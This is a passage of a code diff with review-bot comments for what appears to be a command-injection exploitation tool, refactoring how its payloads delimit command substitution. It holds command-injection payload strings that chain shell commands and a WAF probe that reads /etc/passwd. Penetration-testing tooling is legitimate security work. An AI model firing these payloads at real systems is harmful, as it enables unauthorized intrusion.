+ settings.CMD_SUB_PREFIX = settings.CMD_SUB_SUFFIX = "`"
 return payload
 # eof
\ No newline at end of file
diff --git a/src/utils/settings.py b/src/utils/settings.py
index ad97f3487b..5b8838e89b 100755
--- a/src/utils/settings.py
+++ b/src/utils/settings.py
@@ -262,7 +262,7 @@ def sys_argv_errors():
 DESCRIPTION = "The command injection exploiter"
 AUTHOR = "Anastasios Stasinopoulos"
 VERSION_NUM = "4.1"
-REVISION = "1"
+REVISION = "2"
 STABLE_RELEASE = False
 VERSION = "v"
 if STABLE_RELEASE:
@@ -329,6 +329,9 @@ def sys_argv_errors():
 CMD_NUL = ""
+CMD_SUB_PREFIX = "$("
+CMD_SUB_SUFFIX = ")"
+
 # Maybe a WAF/IPS protection.
 WAF_CHECK_PAYLOAD = "cat /etc/passwd|uname&&ping -c3 localhost;ls ../"
 WAF_ENABLED = False
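Review bot: tamper() now returns `payload` untouched and takes effect only through the module-level settings it mutates, and it does so silently when the guard is false, which neither the function nor the file's "Notes:" docstring (previous hunk) says; add a line to the Notes such as `Notes: Has no effect with --alter-shell or against Windows targets; it rewrites settings.CMD_SUB_PREFIX / CMD_SUB_SUFFIX rather than the payload itself.` so users of the tamper are not surprised by an unchanged payload. The condition reads more naturally as `if not menu.options.alter_shell and settings.TARGET_OS != settings.OS.WINDOWS:`. The removed `payload.replace("$((", "`expr" + ...)` rewrite for arithmetic expansion has no replacement here; if any builder still emits `$((...))`, that form is now left as-is under this tamper, which may or may not be intended. Since both markers are set to the same backtick, any payload that nests one substitution inside another will no longer be parseable by the shell; if nesting exists anywhere, a comment here stating that limitation would help the next maintainer.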
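Review bot: CMD_SUB_PREFIX / CMD_SUB_SUFFIX are module-level defaults that the backticks tamper reassigns at runtime, yet nothing at the definition site says so; a short comment would prevent the next builder from capturing them at import time, e.g. `# Command-substitution delimiters. Tamper scripts (backticks.py) reassign these at runtime, so read them when a payload is built, not at module import.` The module-level list in the hunk below (@@ -340) is already an example of an import-time capture of these values.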
@@ -340,14 +343,16 @@ class HEURISTIC_TEST(object):
 RAND_A = random.randint(1,10000)
 RAND_B = random.randint(1,10000)
 CALC_STRING = str(RAND_A) + " %2B " + str(RAND_B)
-BASIC_STRING = "(" + CALC_STRING + ")"
-BASIC_COMMAND_INJECTION_PAYLOADS = [";echo $(" + BASIC_STRING + ")%26echo $(" + BASIC_STRING + ")|echo $(" + BASIC_STRING + ")" + RANDOM_STRING_GENERATOR ,
- "|set /a " + BASIC_STRING + "%26set /a " + BASIC_STRING
- ]
+BASIC_STRING = ""
+BASIC_COMMAND_INJECTION_PAYLOADS = []
 ALTER_SHELL_BASIC_STRING = " -c \"print(int(" + CALC_STRING + "))\""
-ALTER_SHELL_BASIC_COMMAND_INJECTION_PAYLOADS = [";echo $(" + LINUX_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + ")%26echo $(" + LINUX_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + ")|echo $(" + LINUX_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + ")",
- "|for /f \"tokens=*\" %i in ('cmd /c " + WIN_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + "') do @set /p=%i" + CMD_NUL + " &for /f \"tokens=*\" %i in ('cmd /c " + WIN_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + "') do @set /p=%i" + CMD_NUL
- ]
+ALTER_SHELL_BASIC_COMMAND_INJECTION_PAYLOADS = [";echo " + CMD_SUB_PREFIX + LINUX_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + CMD_SUB_SUFFIX +
+ "%26echo " + CMD_SUB_PREFIX + LINUX_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + CMD_SUB_SUFFIX +
+ "|echo " + CMD_SUB_PREFIX + LINUX_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + CMD_SUB_SUFFIX +
+ RANDOM_STRING_GENERATOR,
+ "|for /f \"tokens=*\" %i in ('cmd /c " + WIN_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + "') do @set /p=%i" + CMD_NUL +
+ " &for /f \"tokens=*\" %i in ('cmd /c " + WIN_PYTHON_INTERPRETER + ALTER_SHELL_BASIC_STRING + "') do @set /p=%i" + CMD_NUL
+ ]
 BASIC_COMMAND_INJECTION_RESULT = str(RAND_A + RAND_B)
 IDENTIFIED_COMMAND_INJECTION = False
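Review bot: ALTER_SHELL_BASIC_COMMAND_INJECTION_PAYLOADS now reads CMD_SUB_PREFIX / CMD_SUB_SUFFIX, but it is evaluated once at module import with the `$(`/`)` defaults, so the later reassignment in backticks.py never reaches this list. That is harmless today only because the tamper skips --alter-shell mode, which is an invisible coupling; a comment such as `# Evaluated at import with the default "$(" ... ")" delimiters; tamper-time changes to CMD_SUB_PREFIX/SUFFIX do not apply here.` would make it explicit. BASIC_STRING and BASIC_COMMAND_INJECTION_PAYLOADS are reduced to empty placeholders, presumably filled in by one of the controller files in this patch that is not shown here; a one-line comment naming where they are populated would save the next reader a search.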